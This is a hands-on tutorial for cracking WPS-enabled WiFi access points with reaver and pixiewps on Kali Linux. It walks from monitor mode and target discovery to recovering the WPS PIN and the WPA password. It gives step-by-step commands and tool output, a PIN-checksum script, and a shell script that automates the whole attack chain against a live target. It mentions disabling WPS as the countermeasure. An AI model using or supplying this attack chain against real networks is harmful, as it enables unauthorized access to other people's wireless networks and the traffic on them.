WiFi Hacking Software: PixieWPS & Reaver in Action
It is a fast attack. For this walkthrough we use Kali Linux 2.0 and the WiFi hacking tools that ship with it, pixiewps and reaver. At the end we also recover the full PSK (the WiFi password) of the attacked AP. Quite nifty!
Reaver: Brute Force Attack on WPS
You probably know this already: with Reaver you can break WPS APs that have no lockout protection, but it takes time, typically between 2 and 10 hours depending on the PIN the AP uses. Reaver tries the WPS PINs one after another against the AP. The PIN has 8 digits, but the last digit is a checksum and the AP confirms the first four digits separately from the remaining three, so Reaver needs at most 10,000 + 1,000 = 11,000 attempts; what makes it slow is that every attempt is a full WPS exchange over the air. We will go into more detail in a separate article dedicated to Reaver.
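Why the online brute force is bounded to a few thousand attempts follows from the PIN format. The following POSIX shell script is an added example, not part of the original article: it computes the WPS checksum digit from the WPS specification's rule, validates a PIN such as the 83075605 that appears later in this article, and enumerates the 1000 candidates that remain once the AP has confirmed the first half. The function names are ours.

```shell
#!/bin/sh
# Added example (not from the original article): the structure of a WPS PIN,
# which is what bounds Reaver's online brute force. The checksum rule is the
# one from the WPS specification; the function names are ours.

# Checksum digit for the first seven digits of a PIN: the digits are weighted
# 3,1,3,1,... starting from the rightmost, and the checksum makes the weighted
# sum a multiple of 10.
wps_checksum() {
    case $1 in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) echo "wps_checksum: need exactly 7 digits" >&2; return 1 ;;
    esac
    rest=$1
    accum=0
    i=0
    while [ -n "$rest" ]; do
        d=${rest#"${rest%?}"}        # last remaining digit
        rest=${rest%?}               # drop it
        if [ $(( i % 2 )) -eq 0 ]; then
            accum=$(( accum + 3 * d ))
        else
            accum=$(( accum + d ))
        fi
        i=$(( i + 1 ))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# True when an 8-digit PIN carries the right checksum digit.
wps_pin_valid() {
    case $1 in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    [ "${1#???????}" = "$(wps_checksum "${1%?}")" ]
}

# Upper bound on Reaver's online attempts: the AP acknowledges the first four
# digits (after M4) before the last four (after M6), and the 8th digit is
# fixed by the checksum, so the two halves are searched independently.
wps_max_attempts() {
    echo $(( 10000 + 1000 ))
}

# All valid PINs once the first half has been confirmed: 1000 candidates, not
# 10000, because the checksum digit follows from the other seven.
wps_candidates_for_half() {
    n=0
    while [ "$n" -lt 1000 ]; do
        seven="$1$(printf '%03d' "$n")"
        echo "$seven$(wps_checksum "$seven")"
        n=$(( n + 1 ))
    done
}

# Demo with the PIN from this article.
echo "checksum of 8307560: $(wps_checksum 8307560)"
wps_pin_valid 83075605 && echo "83075605 is a well-formed WPS PIN"
echo "candidates once the first half 8307 is confirmed: $(wps_candidates_for_half 8307 | wc -l)"
```

The loop works on the PIN as a string rather than as a number, so PINs with leading zeros are handled correctly (arithmetic expansion would read them as octal).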
Here we use Reaver for a much simpler job: capturing the PKE, E-Hash1, E-Hash2 and AuthKey values from the victim AP during a single WPS exchange. This approach is neat because the rest of the attack runs offline, so the lockout mechanism that some APs trigger after a few failed PINs never comes into play. But first we need a victim. We use Wash for that.
Wash: Finding WPS enabled AP’s
Before we start with Wash we need to put our WLAN interface into monitor mode ("mon" interface) on Kali Linux. That is easily done. Our WLAN interface is "wlan2"; adjust all values to your own WLAN interface. You can find yours by listing the wireless interfaces on your system (airmon-ng without arguments, or iwconfig, will do that). In our case wlan2 is the WiFi interface.
Next we create the monitoring interface by running
airmon-ng start wlan2
If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant), stop them first with airmon-ng check kill. The command creates the monitoring interface "wlan2mon". Verify that it exists by listing the wireless interfaces again.
Now we run wash:
wash -i wlan2mon
In our case we found an AP named "TargetWLAN" with the MAC address "BC:14:01:7E:C3:68". Wash also reports for each AP whether WPS is currently locked (the "WPS Locked" column); pick a target where it is not. Adjust the MAC address in the commands below to your target's MAC.
Reaver attacks the AP once
Now we run a single, very simple attack with Reaver:
reaver -i wlan2mon -b BC:14:01:7E:C3:68 -vv -S
The -S option makes Reaver use a small Diffie-Hellman secret, which is why PixieWPS will later not need the PKR value. As soon as Reaver has printed one set of PKE, E-Hash1, E-Hash2 and AuthKey in its verbose output, hit CTRL-C. In our run it looked like this:
With the captured values in hand, we are ready to attack this combination offline with PixieWPS.
PixieWPS – Offline WiFi Attack vs WPS Access Point
Let's feed the captured PKE, E-Hash1, E-Hash2 and AuthKey values into PixieWPS. The real values are not shown in the snippet because they are several hundred hex characters long (the PKE alone is 192 bytes). Pass them exactly as Reaver printed them, colon-separated hex included; PixieWPS accepts that format.
pixiewps -e PKE_VALUE -s E-HASH1_VALUE -z E-HASH2_VALUE -a AUTHKEY_VALUE -S
The result comes back immediately:
Pixiewps 1.1
[*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[+] WPS pin: 83075605
[*] Time taken: 0 s
We have cracked the WPS PIN: it is "83075605". Let's go further: we use Reaver once more, this time for a single shot that yields the PSK (the cleartext WiFi password).
If PixieWPS reports that the WPS PIN was not found, that router is NOT VULNERABLE to PixieWPS: its chipset does not generate the predictable nonces the attack relies on. Check one thing before giving up, though: all values must come from the same Reaver exchange. Mixing a PKE from one run with hashes from another also produces "not found".
Reaver One-Shot PSK from WPS Access Point
Since we have the PIN, we can use Reaver like a sniper rifle: one shot is enough. We add the parameter "-p" with the valid PIN. It looks like this:
reaver -i wlan2mon -b BC:14:01:7E:C3:68 -vv -p 83075605
(Replace the PIN "83075605" with the PIN you just cracked!)
And done. We have the PSK of our target access point!
[+] WPS PIN: '83075605'
[+] WPA PSK: 'XXXXXXXXXX'
[+] AP SSID: 'TargetWLAN'
(WPA PSK removed)
Use that PSK to connect to the AP. You have just compromised a WPS-protected AP in less than a minute. The only reliable countermeasure is to disable WPS on the AP: a lockout after failed PIN attempts does not help, because this attack needs only one exchange.
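The whole procedure above, from the captured exchange to the PSK, as an added shell example that is not part of the original article and not the reaver or pixiewps projects' own code. It assumes the line formats named in the script's header comment (reaver -vv's "[P] Name: value" lines and pixiewps' "[+] WPS pin:" line, as in the outputs shown above), that your pixiewps build accepts -n for the E-Nonce, and that timeout and stdbuf from coreutils are available. The tool outputs embedded at the end are constructed samples with dummy hex so the parsing can be tried offline; run_pixie_dust is the function you would actually execute against the monitor interface.

```shell
#!/bin/sh
# Added example (not from the original article): the four steps of the attack
# glued together, parsing the tool output instead of copying hex by hand.
# Assumptions: reaver -vv prints "[P] Name: value" lines for E-Nonce, PKE,
# E-Hash1, E-Hash2 and AuthKey; pixiewps prints "[+] WPS pin: NNNNNNNN" and
# accepts -n for the E-Nonce; the sample outputs below are constructed, not
# real captures, and use short dummy hex (a real PKE is 192 bytes).

IFACE=${IFACE:-wlan2mon}             # monitor interface from the article
BSSID=${BSSID:-BC:14:01:7E:C3:68}    # target AP from the article

# Value of one "[P] Name: value" line in reaver -vv output (stdin). Only
# colon-separated hex is accepted, so the value is safe to put on a command line.
reaver_field() {
    sed -n "s/^\[P\] $1: *//p" | head -n 1 | grep -Ex '[0-9A-Fa-f:]+' || true
}

# Build the pixiewps command line of the article from one captured exchange
# (reaver -vv output on stdin). Every value must come from the same M1..M3
# exchange, so a missing value aborts instead of silently mixing two runs.
pixiewps_cmdline() {
    out=$(cat)
    pke=$(printf '%s\n' "$out" | reaver_field PKE)
    h1=$(printf '%s\n' "$out" | reaver_field E-Hash1)
    h2=$(printf '%s\n' "$out" | reaver_field E-Hash2)
    ak=$(printf '%s\n' "$out" | reaver_field AuthKey)
    en=$(printf '%s\n' "$out" | reaver_field E-Nonce)
    for v in "$pke" "$h1" "$h2" "$ak"; do
        [ -n "$v" ] || { echo "incomplete reaver output, capture again" >&2; return 1; }
    done
    printf 'pixiewps -e %s -s %s -z %s -a %s' "$pke" "$h1" "$h2" "$ak"
    # The E-Nonce was not needed for the article's target, but other chipsets need it.
    [ -n "$en" ] && printf ' -n %s' "$en"
    printf ' -S\n'    # -S: reaver ran with small DH keys, so PKR is not required
}

# PIN from pixiewps output (stdin); fails when pixiewps reports no PIN.
pixiewps_pin() {
    pin=$(sed -n 's/^\[+\] WPS pin: *//p' | head -n 1)
    case $pin in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) echo "$pin" ;;
        *) echo "no PIN recovered: AP not vulnerable, or values from different runs" >&2
           return 1 ;;
    esac
}

# PSK from the final reaver -p run (stdin): "[+] WPA PSK: '...'".
reaver_psk() {
    sed -n "s/^\[+\] WPA PSK: '\(.*\)'\$/\1/p" | head -n 1
}

# Live run: needs root, the monitor interface and the real tools. stdbuf makes
# reaver line-buffer its output so nothing is lost when timeout stops it after
# the first exchange (the manual CTRL-C in the article).
run_pixie_dust() {
    capture=$(timeout -s INT 60 stdbuf -oL reaver -i "$IFACE" -b "$BSSID" -vv -S 2>&1 || true)
    cmd=$(printf '%s\n' "$capture" | pixiewps_cmdline) || return 1
    pin=$($cmd | pixiewps_pin) || return 1     # word splitting is safe: validated hex only
    reaver -i "$IFACE" -b "$BSSID" -vv -p "$pin" | reaver_psk
}

# Constructed sample outputs for an offline dry run.
SAMPLE_REAVER='[+] Waiting for beacon from BC:14:01:7E:C3:68
[+] Associated with BC:14:01:7E:C3:68 (ESSID: TargetWLAN)
[P] E-Nonce: 11:11:11:11:11:11:11:11:11:11:11:11:11:11:11:11
[P] PKE: aa:aa:aa:aa
[P] PKR: bb:bb:bb:bb
[P] AuthKey: cc:cc:cc:cc
[P] E-Hash1: dd:dd:dd:dd
[P] E-Hash2: ee:ee:ee:ee'
SAMPLE_PIXIEWPS='Pixiewps 1.1
[*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[+] WPS pin: 83075605
[*] Time taken: 0 s'
SAMPLE_PIXIEWPS_FAIL='Pixiewps 1.1
[-] WPS pin not found!'
SAMPLE_REAVER_PSK="[+] WPS PIN: '83075605'
[+] WPA PSK: 'XXXXXXXXXX'
[+] AP SSID: 'TargetWLAN'"

printf '%s\n' "$SAMPLE_REAVER" | pixiewps_cmdline
printf '%s\n' "$SAMPLE_PIXIEWPS" | pixiewps_pin
printf '%s\n' "$SAMPLE_REAVER_PSK" | reaver_psk
```

The hex check in reaver_field is there because the values end up on a command line; it also catches a truncated copy-and-paste, which would otherwise just make PixieWPS report "not found" and look like a non-vulnerable AP.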
Important: to attack APs efficiently you need the right equipment, namely an adapter that supports monitor mode and packet injection. Check out our Hardware Page for the best WiFi hacking adapters and devices: